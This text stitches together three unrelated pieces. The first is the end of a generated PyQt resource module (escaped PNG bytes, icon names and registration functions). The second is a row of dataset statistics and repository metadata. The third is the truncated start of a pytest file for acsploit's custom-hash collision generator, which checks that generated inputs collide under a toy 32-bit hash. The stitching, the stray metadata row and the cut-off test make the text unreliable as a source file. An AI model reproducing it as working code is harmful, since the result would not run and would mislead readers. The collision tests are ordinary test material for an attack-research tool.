\xbd\xe2{\xd3\x99\xfaO\xcd]\xb6|\xde1\xc7/\xa2yR\x1b\xa9\xa4\x8d\x0a\x8b\xe4\xb3\x07'\xf6\xed\xda\xbex\xc7\xab\x1b?\xba\xe2Ha\xed\xda-\xc1\x17\x07\x5c\xb3\xe5\x7f\xad\x02\x15\xa0:i\xf1\xfe%\xcd\xb4\xd4\x84\xe45\x18\xa3S\xda\xcf\xff\xe0\xb8eg^\xbe\xec\xdd\xd7\xd3\xd85\x13\x8c\x82\xa0\x08\xe1\x08\xca\xa5\xb9\xb3\x9di\xc7\x1d\xcb\xc9g\x9cRs\xea\x86\x97.]\xf4\xd0\xdaU\xff\xf4\xe4\xee\xeb7\x1d\x94w3\xd6\xa8\xb1`47\xc7WW\xee6\x95`\xab\x0b{\x03(\x9a?a\x06\x92\x8e\xe0\xfaS'p\xd6T\x17\xa9\x01c\x1c+t\x7f\xba|\xcd\xb5\x97\x9f\xfb\x99\xdbi\xec\x9a\x0b\xa1\x05\xa1\x00e\x83\xb1@\x01\xa1\x067@X\x0e\xc7\x9c\xb4\x98+\xae\xbf:s\xd3E3\xef:\xbe\xc5\xbe\x86\xd8:\x80\x9f4\xc0\xa6\x0exp\x06\xdc\xdc\x11\x13?o\xe8\x86\x17;`\xa2\x00\xe7\xbf*`\xcd\xfc\x1a\x16\xb6\xdb\xa0|@\x80_\xb8y\xd1\xeaK/8q\xcdu\xa0\x0cH\x03N\x0d\xd8)\xb0\x1c\xc0\x06a\x01V\xe4\xb5\x01\xd7#3\xb1\x85\xb3\xaf\x5c\xc3'\xcen\xff\xd6\xc4j\x96\x02\x5c\x0d,O\xc2\xd4\x04\xa0\x8e\xc6\x06\xa6:\xd0(`\xba\x80\xe4\xdb\x15\xd0Qo\xb3\xaa'\x81\x96\x01\x06\x01\xca\x9f\xd1\xd1\xdd}\xe3\x89\x17\x7f\x00\xfc\x12\xa8\x10\x8c\x02\x1d\x80V`4`\xc6\x12\x9b\xf4}j\x9aZX\xf1\xae\x95Uk\xe6%\xff\x0eHj\xa0d \x18\xa7E4\x10\x98\xc8\xdb@\x95x\x9b\x02V\xcdH0\xa1J\xe3\x08\x09@J\x04\x1f\x9ew\xc6E)+\x9d\x86\xd0\x8d\xaa\x22K 
\xf3\xa0J\xa0}\xd0!h\x09FE\xa00Fc\x80\xd0\xf7\x98\xd03\x9b\xf3\x96u\x9d\xd6V\xcd;\x0c\x80\x883\x16\xd0f\x8a\x9c\xa2\x0b\x9c?\xc29\xa6\xc4\x89BQ\x8f\x00\x9f8\x1dog\x88\xd3\x09X\xdc\x0eB\x07TY`\x94N667\xad\x9e4s\x1e\xb89\x10)@DA\x0a\x0b\x8c\x8e*\xa1\xfc\xc8GB\xca\x18\xa3\xcbh\xad\xc0r\xe8\x99\xd3\xc3\xb1\x93\xb7\xaf\xd4;y\x82#\x5cz\xc4\xe7\xea\xd4\xc4\xe9KR3{\xea\xed\xa6&L\x18\x22\xfb\xfa\x08\xb6n\xeb\x1b\xe8?\xf2\xab\xd9\x9a;\xb6\xc1o\x94x\x1b\x02\xda3\x82\x8e\x8c\xc2\x11`Y\xa0d\xd8\xd14yr\x97S\x9d\x86\xb0\x04\x96\x8e\x82\xb7\x82\xb8h:\x0e\xd8\x07\xe5\x95}D\x18\x09\xd0#\x18SnG\xab\xb5\x89\xf3\xeaY\xd9\x0dOV]t\xf1\x8a\xdak>@\xf5\x09\xf3\xb135\x08\xadA\x86\x18\xafD\xd8\xdf79\xf9\xec\xb3W\xdcq\xe7\xbdW\xfcd\xe3\xe6\xbb\xbef\xf8T\x09\xb2\x7f\x94\x80\x84e\xa8\xb2$\xa9x\x0e\x95\xa0\xa9\xb6.\x93\xc4\x04 \x03\xb0\x15\x980\x1e\x5c\x01\x98X@\x10!\xa3\x16\xd3Z\xc5D\xad\xe4j\x9f\xdeu{Y\x9do\x9d\xdf\xf1\xc07I_|\x19\x00\xf8%L\x18`d\xfc~\x15\x92\x988\x81\x86\xcb.\xa2\xe1\xecw\xf2\x89;\xee\xbc\xaa\xfb{?\x9c\xff\xc1Bx\xe1 \xec\xf9#~\x89\xc1\x12\xa6\xecE\xf4l\x04*\x0e\xcc\x80\x91Q\xf6\x85]\x11`\x14\x95*\xf8\x18\x15\xa0\x94Di\x896\x1am\x19\xde|n\x0b\x0d\x8f\xef\xa5\xeb\xce\x9f\x92X\xb6\x1cB/z\x87e#F0# \xac\x08\x19\xa2=\xb7|\x9f\xfc\xc4\xc7\xb8\xa8\xa5iAp\xdb7~\xf6\xbe\xc3\xa53%\x0c\xfd\xde!.\xc9\x114\x84\x02\x82Q,\x0e\x16\x0b\xd9\x12\xa1\x1b\x0fn\x11\xc2B\x84\x8c\xa8\x9cKh\x15 u\x14\xbcR\x0a\xd0\xf4\xf5\x1f\xc2yd=\xdd\x9f\xfd<\x89e'cJ9\x00\xf8\x8f\xa0\x05G\x1b\x18\xa9\xd0\x85\x02f\xcd\xa5\xacy\xff{\x16]S\x9f\xb8\xf9\x0fn\xa1\xbea\xe8/\x81\xb6@\x02\xca\xa6/wx\xffN7?\x18eT\xba\x18Y\x8a\x03\x8f\x18y.\xdfK\x19 \xcb\xd9\x0f\xd1J\xa2\xb5\xa4\x14\x96\x18x\xfaU\xa6\xcdYBr\xf5j\xcc\xd0\x10h\x0dJ\x81\xf4AI\x8c\xd6\x95Ul*\x80\x01m\xd0\x9e\x0f\x7fq\x09\x1f_:\xef\xda\x09\x16\xc7\xfe^\x01\x81\x82u{\xc0v 
i\xc0\x025<\x94{\xe8\xc8\xee\xcd\x18!\x902\x8c\x02\x95>\x15\x82\xe8^\x85(9\x82\x92\xe5\xb3\x0cJ\x1c8p\x80\x9a\xbdY\x1a\xce\xbb\x00\xa4\x02\x15FA\xcb\x00\x13\xfae\xa2;\x15\x11\xcf\x0c\xc6P\xa9DH\xd8\xd8\xc4\x8c\xb3W\xd4\xacj\xae\xbe\xe4\x0f~\x0b=\xbe\x1d\xde5\x0b~\xd6\xeap\xd9\x80\xc4\xd6|\xff\x8d\x97\x9f\xb8\xa1\xe9\x98\xb9\x8dBX\x00\x08*e7\x98xe\x1a\xb4Q()\x09\xfc\x22\x81;Lv\xef~\xba\x1bZ\x10\xd3\xa6c\xbcb<;\x80V D\xe5\xacd<G*\xc2\xa8\xf2\xfb\x0c&*L\x18\xc2\x8cY\x9c>\xbd\xf5\xd4\x7f>\xb4\xdb\x06\xd4\xb8\x02\xf6\xe7\xe0v\xdf\xe1\xa9\x09\x09\x1e\xaf\xb7\xf8\xf4\x81\xb0\xaf\xabw\xdf\xc7v\xae\xfb\x97{\xbaO\xbb\xc0\xd12\x1c\xdb\xab&\x12\xa0\x95\x22\x0c=\x02\xaf\x88\xef\x16\xf0\xfc<\xde\x91\x012m\xb3 \x99\x820\x88\xfa\xde\xe8hG\xf3\x96\x80x\x15+\x89Q\x91G\xeb\xf8\xbdq\x82\xc2\x00j3\xf4t\xb5v\xf2\xc2\xeez ;\xae\x00lxjn\x0a\xb4\xe2pRp\xe3t\x8b\xb6\x92\xaa\xbe\xb4w\xbd\xba\xeai\xed\xb4/|\x07B\xd8q\xa9AkU\xee{\x19\xfa\x84\xbeK0\x8aW\xc0\x0b\x8a\xf8\xb9,\xa9)\xb5qk\x18\xb04\xc2h\x88+\x09D\x82\xb4\xae\x04\xaf\xa26\x8a*\x1bA\x18\x82\xd1\xa435\xd5@z\xfc\x16\xaa\x13pq\x15\xa8h\x00P2\x85\xd1\xdf[\xb2\xf8\xf2\xf7\xe5\xa8b\xdd\xd6\x1d\xcc{\xfa\x11\x9a\xa7\xce\xa0fB\x0b\xda\x18\xd4[\xbd\x1f\x06\x91\x88\xc0\xc3/\xe4\x18\xea\xdf\xc3\xc1R\x09\xa9\x03R2\x8c3oct\xbc.\x11T\x06\xf7?\xcf\x80AGD\x22\x94\x82\xc0\x83rr\x82\x12\x10\x8c/\xe0C)H8@\xf9e)[$\xee\xff\xc6\xca\xaf\x9f\x7f\x5c\xcb,\xfe\xfe\xa9\xaf\xd2s\xd9\x97\xa8\x1f\xee\xe5\xb5_\xdeNz\xe7&2\x0d\x8d\x88\xfa\x0c(\x13\x0d\xb3W\xc0=p\x90\x92c\xf0O\x9aN\xbe\xa7\x83\xa1G\xb2\xd4\xb8%L2\x89\xd0\xaa\xb2:\xe3\xf8\xe3m3&\xeb\xda\xc4^+\xf0\xddH@!\xc7\xf6\x03\xd9\xbd\xc0\xd0\xf8\x02\xac*\x902z\x0a\xf5w\xbe\xb5\xfa\x1f\xce\xff\xc8\x09\x1f\xe4k\xcf\xde\xca\xc7N\xb9\x81ba\x80\x96\x19+\xe8\x9bV\xcb\x83\xf7\xff\x94\xe3\x1e\x7f\x85\xb9\xbb^Fw&\xb0\x0a\x9a\xd2!\xcd\xe3\xe7\x9eC\xd5\x85-\x9c4\xaf\x83R\xb6\x9fm\xb9^\xda\x0f\xf7\xa1\xa7LG\xc8\x10a\x0cc\x8d8pF0\x11\x18\xb4\xd6\xe0{\xe0\x950\x81\x07\x07{yr\xd7\xc1\xe7\x81p|\x01E\x0b\xaa\x01\xd7\xbd\xf2=']y\xf
5G\x16^\xcbc;\x1efQ\xe7I\x9c6m\x05\x1b\xfa7\xb2o\xe0\x0d\xbcP\xb2\xec\xe4KI\xb7\x9dF\xcfY7\xd0\xb9\xcd\x87\x01X{\xc6\x19,\xbe\xeaz\x0e\x95^\xe3\xa0\xbf\x99\xb6\xc2\x02\xaaOX\x88\xdc\xf4|$@\xeb\xca\x0e\x13Df\x88\x05P\xf1ZF\xc1\xbbE\x8cW\x22\xe5\xe6\xd9\xff\xdb\xcd\xc3k\xf7f\x1f\xf9\xfdkT\x00\xda4\xb5\xd4O\xfb\xca_-\xff0o\xe4\xb7\xb0?\xbf\x87w\xcf\xbf\x1a_\x97X\xd0v<\xbb\xb3oR\x0a<\x164M\xc5\xef:\x89\x81\x1b\xb7\xd2q\xeb\xed\x1c\xack\xa4\xe6+\x7f\xc3\xb1-\xd3\xd83l1t\xa4\x89\x15\xad\x17\x12\xac\xd2\x1c\xbe\xfdF&m\x7f\x15\xafg>\x22\xf0\x00\x10F\x10g?\xf2Q\x0902\x04\xdf\x1d\xa5\x1c\xbc\x90\x01\xce\xceM|\xf9\xc9\x97\xee\x1a\x0a\xf5\xc6\xb6E\xd7\xa1\xa5\xe2\xe0\xc6\xef\x8c\xb3\x85<}\xcd\xbbO?\xbf\xb5\xa5\xa1\x9e'_\xff\x15s\xda\xe6\xe0\xaa<hA\xc2N\xd1\xde0\x89\xf6\xfaI8V\x12\x84M\xe9\xb3_\xe4\xb5{\x1fF_q-KN8\x0d\xc7\x84t6\xb5\x22\x8c\x8d\xb2\x02\xd2)X\xbf\xfc\x02\x82\x07~Lg\xa6\x0e\xaf\xb9\x13d\x80@\xc4#`\xe2_gY\xbe'\xf0!\xf00\xbe\x07*\xa4z\xdf\xeb<\xf4\xec\xde\xed?\xd8gn\x99\xfa\xce[\xcc\xe4%7\x11z\xc1\x88\x80\xef\x02f\xac\x00\x8cI\xd7\xa4\x9b\xaeX1{!o\x0c\xee\xc2\xd5\x05&\xd651\xe4\x1f!a\xa5H\x98$\x9epI\x08\x07K;\xd8\xc2&Y\x9b\xc6\xb9\xefG\xd4v\x8d\xb6H\x01OK\xb4Qh\xa1q\x84\xcb\xba\x0dG\xb8s\xfd\x09,\xec\xe9\xe2\xca\x87o\xa3i\xd9q\x84\xd3fcT\x1c\xb41\xa3>\x22\x0c\xa3\x9d\xafC,\xb7Hz\xdb\xabl\x1ch\xe3\xd1\x95\xf7N\x99\xdd\x99\xffBmc\xd7gTq\xc0S~\x00\x08Ru\xed\xf8\xc3\xbd\x15\x01\xb8\xfa\x94Y\xd3\xa6\xcdjn\xa8a\xe7\xa1\xad4e&P\x94y,l\x12\xc6\xc7\xd1\x09l\x91\x1c!\x0a\xde\x1aE\xe6hZ:\x03#%C\xc1\x00\xf1\x08\xe28>\x0f\xfe\xf2\x08\x8f\xbdr\x0cW\x9e3\x91\xb5OH~\xb5\xf03\xac\xc9\xfe\x18g\xdb#$fv\x1364\xa3\x84\x83\xd1\x0a\xa4,\xb7K\xd2\x1d\xc6\xee\xef\xc5\xdf\x7f\x98\x8d\xc7\x9c\xc1-\x853X\xd2lW-\xbe\xb8\xeb\xfa\xbb\x1e\xcd\xce\x0d\x95\xb9DXN\x16\xc0rjHf&W\x04\xe0[+{&\xb5YE\x95#\x17\x0c0\xa9\xae\x8d|\x98\xc5\x11)\x12V\x12G$\xb0G\xb1\x1clF\x05X\x08F(\x0e\xc7\xc38\x8a!\x99\x0cY\xfb\xd4a\x1e{~\x0e\xb7_7\x99-[\x0eSO\x81\x96\xf9=\x0c\xce\xfa<C\xeb\x9e'\xfb\x8b'iV\xaf3\xb1\xceP\x95r@+\
x8a\xc5\x80\x1d\x83\x09\x0a\x9d\xc7q\xf0\xec\x1b\xd8\xd38\x8d\xa5-!}\xbf\xdd\xc6\xb9'\xa5\xe9\xbe\xbc\xf6\xf4\x9b\xee\x1czpxh\xefj0\xae\x9b\xddF\xf79wU\x04\xa0\x13\xc77\xd5Ws\xd8\xed\xc7\xb2!4\x1eR\x86\xe5\xe0\x13:\x85c%p\xe2\xf6\xb1\x88+ De\xa5\x18\x83\x93\x84\xdfm>\xc4}\xbf\x9c\xc9\xd7\xae\x9bB\x8d\x13\xb0c\xd7\x107}\xa4\x9b\x0d;4\xf9A\x8b\xfe\xee\xa5<\xbbl)\x0d\x89\xc3l\xd8\xf4:I\xaf\x80\xc1\x22\x9f\xa9g\xf6\xe2\xd9PSO\xebD\x90}\x9a\xe5\xc7&\xa8\x9a3\x9d\xe7\xd6\xf5\xf2\xe1\xcb\x8f\xe1\x93\x974.\xff\xcb[\x9e\xfc6p5\xd8\xf4\xbd\xfcM\xe0}\xc4\x02\x9c\xb6d\xd2\x90\xf5\x0e\xe18\xd5\x14\xe4P9\xe3\x09\x9d,\x0fm\xd4B\xce(Q\xf0X\x081\x02\x91\x09K\x10\x0e\xe7\xb8\xfb\x81\x06\xce\x7f\xc7\x0cfO\x85\x1f\xfd\xfc\x10g\xbc\xb3\x9d\xfaj\xc1\xe2\x99\x82\xad{\x15\xa1\x0f\xab\xe6\xdbTWOdB\xd7D~\xbd\xcbC\x1b\xc3\xaa\xe9i\x16\xb5\xc2\x9b\x87\xe0w\x074K;\x0c\x0b\xa6A\xd2\xa9\xa6\xaf?\xc33\x1b\x06\xb9pY#\xcf]\xf8\xae\xab\xee\xd8\xbc\xfa\xd1\xa0\xff\xd1\x07J\x876U>\xa7\x91\xb6\xe3J\x97\xa2\x1aF\x8b\x90\x82\xccQ\x92\xc3\xe5\xe7\xa2\x1c%GLY\x5ca\xf4\x1c\xf92\x1eY~\xbdn\x08%g\xb3\xea\xb4\x14/ns\xb1S\x09\xda;\xaa\x19\xf2\xc0I\xc0\x9c.\x9bi\xcd\x82\x99m0\xa5\x01\xce=\x06\xae\x5cP\xc5{\x17\xa49\xaf\x1b:\xeaa\xfe\x14\xb8h\x0e\x9c<\xdb\x06\x01\x85\x00N<a\x22\xdb\xf6\xba\x1c\x186\x5czf\x0d\xddK?~+VU\xcd\xd8-\xe4Y\x85#\xb9A\xa6\x08\x07O\x17Q&\x8c3\x1f\xf5\xbfS\xee}\x07K\x8cb\x11W\x00\x00\xcb\xb2\x08s\xc3<\xfb\x5c\x17g\xbec2\xca\x82\xcd\xbb\x8a,\x9c\xd3\xc4`\x09l P\x90\xb4aR\x8b\x850`\x09H:\xb0\xb0\x0d\x0c\x90\xb4@\x19hL@C\x8d\xc5\xb0\x0f\xa1\x8a\xb0\x1cA{G\x86\x97\xb6\x16\x98?7\xc3\xa9\xa7-\xea\xd9\xb1n\xf9%\xe1\xa1\xc7\xee\xaeT \xb0\xb7\xee\xeb\x1dB\x0a\x97J\xe6s\x11*\xcarA\x8d\x9e\x87\xa2*\x94\xef\xa2\xb3k\x06\xd9\xbec\x88Bn*\xb3fU\xb1\xabW\x96\xb3\x9f\xaeq\x18v\xa1\x10D\xe4}\xca\x82r>\x0c\xfb\x91w%x\xb2r7\xe4B\xd6\x85\xbc\x1fe\xbf\x18B\xb6\x08m\xed\xb5\x1c\x18\x0c\x19(\xc2\xfcy\x19\x1a;\xcfz\x0f *\x150\xf6\xa3;\xb6\x14\xdf;\xbc\xb2@\xcaV\xd8:\x11U@\x8c\xa0\x9d\xa3\xfa?\xdeB 
aI\xb6\xbeV\xc5\x84\xc6VR\x19\xd8\xb5\xd3\xa7\xb5\xb9\x9a\x9c\x07\x8e\x80\x84\x02\xc7\x06\xc7\x8a\x9em+\xaa\x80\x00\xc4\x98\xcf\x0a\xd0\x06\xd4(\x1a\xa4\x01\xa9 \xd4`\x84 ]\x9b\xe2\x8d\xbe\x90\x96I\x09Z;\x8f;\xf1\xd0\xc6\xba.`w$\xc0r~\x91}S\xffn\xfd\xf3\x83\xf3\x16\x9f\x1e\xe2\xb9\x09\x1c\x9d\x88\x04\x881\x02*+\x14\x81\xb0,,]\xa2ww\x0f\x1d-\x19\x86\xbd(k\x89t\xa2|N\xda\x90\xb0\xc0\x89\xb1\xad\x8a\x00\x8b\xca\x975T\x04\xe8\xb7\x04\xc4\x84:\x12U[WE\xdf@\xc0\x94\xce\x04\x13&\xb64\x88T\xc7\xbc\x8a\x00C\x09\xecO>\xf7\x90\xfbx\xbaN\x8b\x99'$\xf0\x82\x04BF\xdb\xc7\xb1\x1c,\xa2\x1f1Q\x9e\x01\x01\x8cxK\xa0\xc2\x22\xb9\x81$=\xd3\x13\x1c\x1e\x06+\x99\xc0S\x10\x8c\xa2\x19+@\x94\x89* \xa0R\x80\xa3\x05(S\x11\x10*0\x8e\x8d\xafE\xb9\xd5\xd2\xb5i,\xa7i\xfa\xd8o!!\x9e\x90Eq\xd5\xbf\xdd!\xbf\xdd\xbf\x92\x9ay\xa7J\xea\x9a<\x8ce#\xb5\x8d\x18\xc5\xd8X\xfa\xad\xf6\x11XX\xc8\xb0\x80W\x02i\x04C\xae\xa1*\xe10\xec\xc7\xedc\x8d`\xc7\xc1\x8f' \xc6\x18\xd0\x8c\x11pT\x15\x8c\xed0\xe8Fk\x1b\xe3\xd4U\x048\x16\x84\x80%\xee\xd1o\x1czu\xe3\x0f\xd3\xb7\xbc\xf6T\xdd9\x1ds\x13\xce\xe4\x19\x8a\x09m\x8a\x9azH\xa5\xc1I\x08l[ F\x05\xd8 u\x09)]\x8a%II\x0a\xec\x84\xa0\xe0\xc7\x99\xb7!\xa1\xc6\x0a\xb0\xc4\x98\x198Z\x80\x8eD\xc8J+\x11\xc6^\xdb69\x17J\x05\x1f\xa3$\x95-\xd4\x97\xab\xbc\xcd\xf77\xb1{\xf7\x05\xfe\xbam\x8bw\xdd\xb3\xe7s\xcf\xddzx\xed\xcf?\x97\x7f\xfd\xfe\xcfz\xd9\xfb\xfe:\xf4\xee\xbb94\xf7}!\xe4\xbe/\x05\xdc\xff\xe5\x80\x07\xbf*\xd9\xbf{\x90\xec\x91\x22\xa1\x80\x92\x84B\x18Q\x0c\xa00>\xe4\xdf\xc2\x8f|\xc1\x8f\xef\xc7\xf9[_G\xc9\xc9\xf6\x0f\x83.\x0eU*\xb0\xb1\x17N\xcd\x80\x95\xac\x08\x09\xbc\x8der@\x1f\x19\x89\xd5,\x85\xdd\x08\x22\x83eW#D\x02c@h\xdf\xc9\x0c\x9d\xde\xbb\xad\xff\xc6\xd9\xe1\x14\x14\x95\xac\xc7\xfd\x8f=N\x05\xc6\xce@\x5c\x85\x98\xb8\x85P\x95\x0a\xa0\x04d\x07\x02\x0e\xec\xda+\x8d\xec\xdd>v\x06\x9e\xdf\x0e\x0bz*\x02\xc6\x92\x07\x9d\xc7\xe8\xdd\x00(\xc6Xu\xed\xd9\xaf\xf4m~\xe3C\xfbw\xce\xack\xebi\xc0\x0f8z\xfb\x1c\xb5B\xc7\x0a 
\xee\x7f\x13\x05_Y\xa7\x15\x10i\xd8\xf9b\x1f\xb9\xde\xf5\xaf\x1buxS\xa5\x85\x00\xa4\x82\xf5\xdb\xc0\xf5y\xfb&\x06\x82\xbc\xfb\x8f/\xdf\xfb\x02Cy\x8d+\xa2\x92\xc7\x8cm\x97\xa3Z(>\x8f\xdb>Q;\xfa\x09\xd8\xf3\xda0\x9b\x1e\xde\x80,\xfe\xeb\xdd`\xfa\xc7V N\x01\xb9\x02o\xdf\x0c\x96\xc5\x97\xfb_}s\xd13\xb7=\xber\xe1\xfbO\xa5\xa1\xb3\x96P\x82\x90`\x13\xb7\xcf8C\x1c\xb7O\xbcJ+(\x00'\xf2\xfb_<\xc8+\xdf\x7f\x81|\xef=\xf7k\xb9\xf9.bs\xf8SMd@8\x00\xae\x9d\xb0.\xe8{i\xe7m\xd9\x1d\xfd\x1f\x9cv\xfa\xf1v\xe7\x92\xe9\xd4u4\x90\xac\x16\xd8\x0eX\x95\xd6\x89\x01C\xc5\x0c\xa0c12\x047\x17\x92\xdd5\xc0\x9bO\xefd\xdf\xf3\xaf\xb8\xd2{\xe4N\xcc3_\x02\xb2\xff}\x02\x8c\x87\x91\x03@\x0a\xa0d'\xed\x8fzC\xc5;\xb7\xdc\xf7\xdd\xab\xb7>\xd4yV\xa6\xad\xab+\xd3\xdef\xd7\xb66P\xd5XC\xb2&\x85\x9d\xb2\xb1\x13N\xa5\x02\x1aT\x10\x22}\x89\x9f\xf7p\x07\x0a\xe4\x0f\x0c\x90\xef\xdd\x1f\x16\x0f\xedz\x136=\x03/\xff\x04\x86F<\x0a\xe0\xbfO\x00!\x85\x03\x9f&=\xe1[\xc4\x86e[\xeb\x8d\xfc\xcdz\x1d\xee\xab\xc9\xed\xcd\x1c\x9b\xdb\xdb4\x17\x9a\xa6Cz2d\x1a\xa1\xaa\x1a,\x07\xec*\x00\x90\x1eh\x09\xa5\x12\x14s0|\x00\x06w\xc3\xe1\xed\x90\xdd\x0a\x1cd\x1c\xfb\xff\xffV\xf9\xbf\xb6\x7f\x07=;\xcc\xf1\xa3\xb2\xb6G\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x13\x015z\xc7\x00k\x00o\x00p\x00e\x00t\x00e\x00a\x00v\x00a\x00i\x00l\x00a\x00b\x00l\x00e\x00.\x00p\x00n\x00g\x00\x0d\x0e@@\xc7\x00m\x00i\x00n\x00i\x00t\x00o\x00o\x00l\x00s\x00.\x00p\x00n\x00g\x00\x10\x05\xe9\x01g\x00a\x00r\x00t\x00s\x00f\x00f\x00t\x00s\x00c\x00o\x00p\x00e\x00.\x00p\x00n\x00g\x00\x16\x07\xbc\x11\xc7\x00m\x00e\x00t\x00a\x00c\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00o\x00n\x00l\x00i\x00n\x00e\x00.\x00p\x00n\x00g\x00\x14\x0a4\xf1\x07\x00b\x00l\x00u\x00e\x00_\x00a\x00n\x00g\x00l\x00e\x00_\x00s\x00w\x00i\x00r\x00l\x00.\x00j\x00p\x00g\x00\x10\x03\x16\x82G\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00m\x00a\x00i\x00l\x00.\x00p\x00n\x00g\x00\x13\x09+\x13G\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00j\x00o\x00u\x00r\x00n\x00a\x00l\x00.\x00p\x00n\x00g\x00\x11\x04[\x0b\x07\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00n\x00o\x00t\x00e\x00s\x00.\x00p\x00n\x00g\x00\x14\x08\x130\x07\x00k\x00o\x00n\x00t\x00a\x00c\x00t\x00_\x00c\x00o\x00n\x00t\x00a\x00c\x00t\x00s\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x02\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x01\x00\x00|\xee\x00\x00\x016\x00\x00\x00\x00\x00\x01\x00\x00\x965\x00\x00\x00^\x00\x00\x00\x00\x00\x01\x00\x00\x11{\x00\x00\x00\x84\x00\x00\x00\x00\x00\x01\x00\x00\x16\x8d\x00\x00\x01^\x00\x00\x00\x00\x00\x01\x00\x00\xa5n\x00\x00\x01\x0a\x00\x00\x00\x00\x00\x01\x00\x00\x89t\x00\x00\x00\xb6\x00\x00\x00\x00\x00\x01\x00\x00N\xb8\x00\x00\x00\xb6\x00\x00\x00\x00\x00\x01\x00\x00 \x82\x00\x00\x00>\x00\x00\x00\x00\x00\x01\x00\x00\x09P"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 6,309.772727 | 136,602 | 0.742189 | 31,698 | 138,815 | 3.245063 | 0.143795 | 0.012891 | 0.010237 | 0.010966 | 0.514592 | 0.514408 | 0.512629 | 0.511822 | 0.507904 | 0.506339 | 0 | 0.248529 | 0.002305 | 138,815 | 21 | 136,603 | 6,610.238095 | 0.494184 | 0.001311 | 0 | 0 | 0 | 0.333333 | 0.997367 | 0.994871 | 0 | 0 | 0.000058 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ab17a9a94beacc48676c15727820f9a783a2a8b | 4,635 | py | Python | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 107 | 2018-05-03T16:53:01.000Z | 2022-02-23T14:47:20.000Z | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 7 | 2019-04-28T00:41:35.000Z | 2021-05-04T20:35:54.000Z | test/exploits/hashes/collisions/test_custom_hash.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 16 | 2019-03-29T12:39:16.000Z | 2021-03-03T11:09:45.000Z | import pytest
from exploits.hashes.collisions import custom_hash
from test.exploits.dummy_output import DummyOutput
def truncate_32(x):
return x & 0xFFFFFFFF
def hash_function(x, y, z):
return truncate_32(truncate_32(x * y) + z)
def test_custom_hash():
output = DummyOutput()
n_collisions = 10
image = 0
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'image'
custom_hash.options['image'] = image
custom_hash.options['hash'] = '+ * x y z'
custom_hash.run(output)
assert len(output) == n_collisions
for i in output:
assert hash_function(int(i[i[2]].as_long()),
int(i[i[1]].as_long()),
int(i[i[0]].as_long())) == image
def test_custom_hash_preimage():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10, z = 30'
image = 80
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
custom_hash.run(output)
assert len(output) == n_collisions
for i in output:
assert hash_function(int(i[i[2]].as_long()),
int(i[i[1]].as_long()),
int(i[i[0]].as_long())) == image
def test_custom_hash_malformed_hash():
output = DummyOutput()
n_collisions = 10
image = 0
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'image'
custom_hash.options['image'] = image
custom_hash.options['hash'] = '+ * x y z q'
with pytest.raises(AssertionError):
custom_hash.run(output)
def test_custom_hash_unknown_variable():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y q'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_missing_preimage_variable():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, y = 10'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_missing_comma():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5 y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_equals():
output = DummyOutput()
n_collisions = 10
preimage = 'x 5, y = 10, z = 30'
custom_hash.options['n_collisions'] = n_collisions
custom_hash.options['variable_width'] = 32
custom_hash.options['target_type'] = 'preimage'
custom_hash.options['preimage'] = preimage
custom_hash.options['hash'] = '+ * x y z'
with pytest.raises(ValueError):
custom_hash.run(output)
def test_custom_hash_preimage_parsing_error_multiple_assignments():
output = DummyOutput()
n_collisions = 10
preimage = 'x = 5, x = 10, z = 30'
